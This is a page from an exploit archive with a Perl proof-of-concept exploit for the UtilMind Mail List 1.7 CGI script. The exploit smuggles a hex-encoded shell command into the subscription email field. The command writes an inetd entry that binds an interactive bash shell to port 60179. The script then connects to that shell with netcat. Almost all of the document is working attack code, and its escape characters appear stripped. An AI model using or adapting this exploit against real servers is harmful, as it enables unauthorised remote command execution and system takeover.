UtilMind Mail List 1.7 - Users Can Execute Commands

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : UtilMind Mail List 1.7 - Users Can Execute Commands
# Published : 2000-11-17
# Author : teleh0r
# Previous Title : ListMail v112 - Command Execution
# Next Title : Poll It CGI v2.0 exploit

#!/usr/bin/perl -w

## Mailing List & News Version 1.7 / PoC Exploit.
## UtilMind Solutions / http://www.utilmind.com/
##
## Actually a pretty amusing exploit to write!
##
## The 'open(MAIL, "|$mailprog $address")' ...
## code sends e-mail to those who are on the
## mailing list - and the subscribers' e-mail
## addresses are located in a file called:
## maillist.txt. (could be called anything, really)
##
## So we sign on 'hass@ & echo 'fido stream tcp ..'
## and send out a mail to everyone on the list,
## including to our 'evil' address. Sending mail 
## to the subscribers is supposed to be limited 
## to those who know the password - but it really
## isn't - so we don't have to wait. <grin>
##
## Exploit will attempt to bind a shell at port 
## 60179/fido using inetd.
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>n");
    exit(1);
}

my($target,$agent,$cgicodea,$cgicodeb,$code,
   $iaddr,$paddr,$proto);

$target = $ARGV[0];
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

print("nRemote host: $targetn");
print("CGI-script: /cgi-bin/maillist.cgin");

$code =
"POST /cgi-bin/maillist.cgi HTTP/1.0
Connection: Keep-Alive
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: 160

";

$cgicodea =

# Utilmind Solutions Maillist Portbinding Cgicode 
# Yes! it is meant as a joke!
"x65x6dx61x69x6cx3dx68x61x73x73x40x2bx26".
"x65x63x68x6fx2bx27x66x69x64x6fx2bx73x74".
"x72x65x61x6dx2bx74x63x70x2bx6ex6fx77x61".
"x69x74x2bx6ex6fx62x6fx64x79x2bx2fx62x69".
"x6ex2fx62x61x73x68x2bx62x61x73x68x2bx2d".
"x69x27x2bx3ex2bx2fx74x6dx70x2fx2ex68x61".
"x73x73x3bx2fx75x73x72x2fx73x62x69x6ex2f".
"x69x6ex65x74x64x2bx2fx74x6dx70x2fx2ex68".
"x61x73x73x26x42x31x3dx4fx4bx26x61x63x74".
"x69x6fx6ex3dx73x75x62x73x63x72x69x62x65";

$cgicodeb =
"subject=teleh0rz+cgi+warez&message=hass";

send_code();
print("nSleeping 5 seconds - waiting for the shell ...nn");
sleep(5); system("nc -w 10 $target 60179"); exit(0);

# The sleep time may have to be longer - considering that the
# maillist.cgi script has a few e-mails to send. ;)

sub send_code {
    connect_host();
    send(SOCKET,"$code$cgicodea1512", 0)  || die("Error: $!n");
    close(SOCKET); connect_host();
    send(SOCKET,"$code$cgicodeb1512", 0)  || die("Error: $!n");
    close(SOCKET);
}

sub connect_host {
    $iaddr = inet_aton($target)                   || die("Error: $!n");
    $paddr = sockaddr_in(80, $iaddr)              || die("Error: $!n");
    $proto = getprotobyname('tcp')                || die("Error: $!n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)  || die("Error: $!n");
    connect(SOCKET, $paddr)                       || die("Error: $!n");
}


# www.Syue.com [2000-11-17]